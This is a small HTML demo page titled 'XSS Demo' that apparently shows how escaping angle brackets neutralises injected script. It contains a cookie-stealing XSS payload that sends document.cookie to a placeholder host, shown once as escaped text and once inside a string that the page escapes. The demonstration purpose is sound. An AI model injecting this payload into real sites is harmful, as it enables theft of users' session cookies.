<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>XSS Demo</title>
</head>
<body>
    <p>XSS Demo</p>
    <div id="container">
        <p>123123</p>
        &lt;script&gt;
            var img = document.createElement('image')
            img.src = 'https://xxx.com/api/xxx?cookie=' + document.cookie
        &lt;/script&gt;
    </div>

    <script>
        const str = `
            <p>123123</p>
            <script>
                var img = document.createElement('image')
                img.src = 'https://xxx.com/api/xxx?cookie=' + document.cookie
            </script>
        `
        const newStr = str.replaceAll('<', '&lt;').replaceAll('>', '&gt;')
    </script>
</body>
</html>